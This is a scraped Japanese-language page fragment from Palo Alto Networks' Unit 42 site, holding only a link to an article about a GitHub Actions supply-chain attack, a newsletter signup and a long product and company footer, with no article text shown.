  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/github-actions-supply-chain-attack/ "GitHub Actionsサプライチェーン攻撃: Coinbaseへの標的型攻撃が拡大し、tj-actions/changed-files事件が多発: 脅威評価（4/2更新）")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
